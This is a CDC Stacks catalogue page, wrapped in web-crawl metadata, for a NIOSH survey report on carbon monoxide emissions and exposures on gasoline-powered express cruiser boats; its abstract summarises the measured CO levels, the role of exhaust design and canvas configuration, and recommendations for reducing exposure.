17507,
17637,
17638,
17652,
17653,
17677,
17678,
17808,
17809,
17832,
17833,
18189,
18190,
18203,
18204,
18386,
18391,
18392,
18416,
18417,
18503,
18504,
18512,
18513,
18555,
18556,
18642,
18643,
18664,
18665,
18983,
18988,
18989,
19042,
19043,
19054,
19055,
19079,
19080,
19168,
19169,
19179,
19180,
19255,
19256,
19728,
19729,
19742,
19743,
20576,
20577,
20997,
20998,
21232,
21233,
21268,
21269,
21285,
21286,
21297,
21298,
21402,
21403,
21429,
21430,
21584,
21585,
21605,
21606,
21706,
21707,
21745,
21746,
21812,
21813,
21839,
21840,
21984,
21985,
22011,
22012,
22209,
22210,
22248,
22249,
22371,
22372,
22413,
22414,
22538,
22539,
22577,
22578,
22685,
22686,
22727,
22728,
22877,
22878,
22907,
22908,
23110,
23111,
23140,
23141,
23306,
23307,
23348,
23349,
23484,
23485,
23526,
23527,
23623,
23624,
23665,
23666,
23686,
23687,
23704,
23705,
23877,
23878,
23886,
23887,
23978,
23979,
23998,
23999,
24024,
24025,
24033,
24034,
24048,
24049,
24324,
24325,
24346,
24347,
24380,
24381,
24401,
24402,
24422,
24423,
24482,
24483,
24506,
24507,
25358,
25359,
25384,
25385,
25404,
25405,
25471,
25472,
25490,
25491,
25705,
25706,
25724,
25725,
25739,
25740,
25754,
25755,
25770,
25771,
25823,
25824,
25828,
25829,
25839,
25849,
25859,
25869,
25870,
25879,
25880,
25925,
25974,
26010
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 26010,
"ccnet_original_nlines": 463,
"rps_doc_curly_bracket": 0.04013840854167938,
"rps_doc_ldnoobw_words": 1,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2632938027381897,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.016433849930763245,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.5278788805007935,
"rps_doc_frac_unique_words": 0.1829567849636078,
"rps_doc_mean_word_length": 3.8551080226898193,
"rps_doc_num_sentences": 324,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.123039722442627,
"rps_doc_word_count": 4072,
"rps_doc_frac_chars_dupe_10grams": 0.17600968480110168,
"rps_doc_frac_chars_dupe_5grams": 0.3928526043891907,
"rps_doc_frac_chars_dupe_6grams": 0.3361574709415436,
"rps_doc_frac_chars_dupe_7grams": 0.30143967270851135,
"rps_doc_frac_chars_dupe_8grams": 0.23996686935424805,
"rps_doc_frac_chars_dupe_9grams": 0.20907121896743774,
"rps_doc_frac_chars_top_2gram": 0.009300550445914268,
"rps_doc_frac_chars_top_3gram": 0.007262070197612047,
"rps_doc_frac_chars_top_4gram": 0.006370239891111851,
"rps_doc_books_importance": -3135.610107421875,
"rps_doc_books_importance_length_correction": -3135.610107421875,
"rps_doc_openwebtext_importance": -1744.25537109375,
"rps_doc_openwebtext_importance_length_correction": -1744.25537109375,
"rps_doc_wikipedia_importance": -932.380615234375,
"rps_doc_wikipedia_importance_length_correction": -932.380615234375
},
"fasttext": {
"dclm": 0.13417178392410278,
"english": 0.6721863746643066,
"fineweb_edu_approx": 1.3034981489181519,
"eai_general_math": 0.9995342493057251,
"eai_open_web_math": 0.889542281627655,
"eai_web_code": 0.8445663452148438
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "512.7",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Mathematics",
"level_3": "Algebra"
}
},
"secondary": {
"code": "512.9",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Mathematics",
"level_3": "Algebra"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-7,756,776,332,276,834,000
|
In-depth survey report of carbon monoxide emissions and exposures on express cruisers under various operating conditions
Advanced Search
Select up to three search categories and corresponding keywords using the fields to the right. Refer to the Help section for more detailed instructions.
Search our Collections & Repository
All these words:
For very narrow results
This exact word or phrase:
When looking for a specific result
Any of these words:
Best used for discovery & interchangable words
None of these words:
Recommended to be used in conjunction with other fields
Language:
Dates
Publication Date Range:
to
Document Data
Title:
Document Type:
Library
Collection:
Series:
People
Author:
Help
Clear All
Add terms to the query box
Query box
Help
Clear All
i
In-depth survey report of carbon monoxide emissions and exposures on express cruisers under various operating conditions
Filetype[PDF-807.33 KB]
• English
• Details:
• Description:
"Under an interagency agreement with the United States Coast Guard, working in collaboration with an industry consultant, National Institute for Occupational Safety and Health (NIOSH) researchers evaluated carbon monoxide (CO) exposures on ten express cruiser boats from several manufacturers. The evaluated boats were new and included several different models. These boats had gasoline-powered propulsion engines and used gasoline-powered generators to provide electricity for onboard appliances. This study was performed for the U.S. Coast Guard to better understand how CO poisonings may occur on express cruisers, identify the most hazardous conditions, and begin the process of identify controls to prevent/reduce CO exposures. Boats were evaluated while stationary and at multiple speeds, ranging from 5 to 25 miles per hour. CO concentrations were measured by multiple real-time instruments, which were placed at different locations on the boats with overhead, enclosing canopies set at various configurations. Many of the evaluated boats generated hazardous CO concentrations: peak CO concentrations often exceeded 1,100 parts per million (ppm), while average CO concentrations were well over 100 ppm at the stern (rear). Two boats with a combined exhaust system (exhausting at the sides and underwater) had dramatically lower CO concentrations than any of the other evaluated boats (about 40% lower). Based on the results and observations made in this report, the following major findings are summarized below: 1. When the canvas is deployed and boat is underway, CO concentrations exceeded the immediately dangerous to life and health (IDLH) level near the swim platform for many of the evaluated boats. 2. The combination of travel at low speeds into the wind with the canvas fully deployed and no forward hatches, windows or front panels opened maximized the station wagon effect, pulling significant amounts of CO into the cockpit. 3. Different exhaust configurations have a major impact on how CO concentrations are entrained into the cockpit and other occupied areas. Accordingly, boats equipped with underwater exhaust exhibited significantly lower CO concentrations than vessels equipped with other exhaust designs. 4. CO concentrations are typically higher at the stern of the boat and become gradually lower toward the front of the boat. 5. Stationary smoke tests in the engine compartment showed satisfactory sealing of the bulkhead between the engine and adjacent compartments on all boats. Based on the preceding findings, the following recommendations are made to reduce CO concentrations on express cruisers: 1. Boat manufacturers should consider underwater exhaust that will significantly reduce CO concentrations inside the cockpit and other occupied areas compared to surface exhaust. 2. Because of the station wagon effect, some canvas configurations should not be used while boat is moving or propulsion and/or generator engines are running. 3. The possibility of adding force draft blowers into the cabin, creating a positive pressure to minimize potential CO intrusions, should be studied. Auxiliary blowers can be fitted and routed to ventilate the cockpit and swim platform areas in order to minimize negative pressure areas throughout the vessel. 4. Since properly sealed cabin doors directly influenced the CO concentration in the cabin area, door suppliers should be encouraged to develop better sealing methods and designs. 5. Windshield manufacturers should be encouraged to study the possibility of maximizing ventilation of occupied areas by improving the design of the center and side wings of the windshield. 7. Due care should be exercised when designing the powered ventilation system on the engine compartment, locating the air intake on the opposite side of the generator exhaust. Also, potentially moving the intake much farther forward on the vessel would help minimize the intake of CO exhaust into the engine compartment. 8. The development of cleaner burning engines (propulsion and generators) with catalytic converters should continue since they have the potential to greatly reduce CO concentrations to safer levels. 9. The American Boat and Yacht Council (ABYC) should examine their standards and emphasize ventilation problems that can lead to CO intrusions, taking a strong position against surface exhaust designs for propulsion engines." - NIOSHTIC-2 NIOSHTIC no. 20030253 289-11a.pdf
• Document Type:
• Main Document Checksum:
• File Type:
Supporting Files
• No Additional Files
More +
You May Also Like
Checkout today's featured content at stacks.cdc.gov
|
{
"url": "https://stacks.cdc.gov/view/cdc/48378",
"source_domain": "stacks.cdc.gov",
"snapshot_id": "crawl=CC-MAIN-2022-40",
"warc_metadata": {
"Content-Length": "197597",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:QAFEQKJQCUQPOYMN2A3EVRRI3XYZASQI",
"WARC-Concurrent-To": "<urn:uuid:c3d439c3-9e6b-42d6-89ac-b13b039b84e0>",
"WARC-Date": "2022-10-04T06:17:36Z",
"WARC-IP-Address": "54.84.224.193",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:CPL7X2QCBF4RIV6G2EINYLDTAR7R4PPJ",
"WARC-Record-ID": "<urn:uuid:95e5a722-3636-468e-89b0-9944099e6d41>",
"WARC-Target-URI": "https://stacks.cdc.gov/view/cdc/48378",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:898fdb1e-3c38-4b75-9e59-929f1cab9c96>"
},
"warc_info": "isPartOf: CC-MAIN-2022-40\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September/October 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-230\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
121,
137,
290,
291,
327,
328,
345,
346,
370,
371,
398,
399,
434,
435,
455,
456,
503,
504,
525,
526,
582,
583,
593,
594,
600,
601,
625,
626,
629,
630,
644,
645,
652,
653,
668,
669,
677,
678,
690,
691,
699,
700,
707,
708,
716,
717,
722,
732,
733,
760,
761,
771,
772,
777,
787,
789,
790,
911,
912,
936,
937,
938,
950,
951,
964,
965,
984,
5434,
5455,
5485,
5502,
5503,
5524,
5525,
5551,
5552,
5563,
5564,
5586,
5587
],
"line_end_idx": [
121,
137,
290,
291,
327,
328,
345,
346,
370,
371,
398,
399,
434,
435,
455,
456,
503,
504,
525,
526,
582,
583,
593,
594,
600,
601,
625,
626,
629,
630,
644,
645,
652,
653,
668,
669,
677,
678,
690,
691,
699,
700,
707,
708,
716,
717,
722,
732,
733,
760,
761,
771,
772,
777,
787,
789,
790,
911,
912,
936,
937,
938,
950,
951,
964,
965,
984,
5434,
5455,
5485,
5502,
5503,
5524,
5525,
5551,
5552,
5563,
5564,
5586,
5587,
5642
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5642,
"ccnet_original_nlines": 80,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3106295168399811,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.029927760362625122,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1568627506494522,
"rps_doc_frac_unique_words": 0.4734939932823181,
"rps_doc_mean_word_length": 5.5445780754089355,
"rps_doc_num_sentences": 47,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.426239967346191,
"rps_doc_word_count": 830,
"rps_doc_frac_chars_dupe_10grams": 0.0451977401971817,
"rps_doc_frac_chars_dupe_5grams": 0.06866580247879028,
"rps_doc_frac_chars_dupe_6grams": 0.05867014080286026,
"rps_doc_frac_chars_dupe_7grams": 0.0451977401971817,
"rps_doc_frac_chars_dupe_8grams": 0.0451977401971817,
"rps_doc_frac_chars_dupe_9grams": 0.0451977401971817,
"rps_doc_frac_chars_top_2gram": 0.04172099009156227,
"rps_doc_frac_chars_top_3gram": 0.014776179566979408,
"rps_doc_frac_chars_top_4gram": 0.009126470424234867,
"rps_doc_books_importance": -389.11212158203125,
"rps_doc_books_importance_length_correction": -389.11212158203125,
"rps_doc_openwebtext_importance": -213.09857177734375,
"rps_doc_openwebtext_importance_length_correction": -213.09857177734375,
"rps_doc_wikipedia_importance": -156.05978393554688,
"rps_doc_wikipedia_importance_length_correction": -156.05978393554688
},
"fasttext": {
"dclm": 0.07178592681884766,
"english": 0.9291999340057373,
"fineweb_edu_approx": 2.572633743286133,
"eai_general_math": 0.0886489674448967,
"eai_open_web_math": 0.37878888845443726,
"eai_web_code": 0.001237989985384047
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "623.8",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Military engineering and Marine engineering"
}
},
"secondary": {
"code": "614.2",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Public health"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "5",
"label": "Evaluate"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|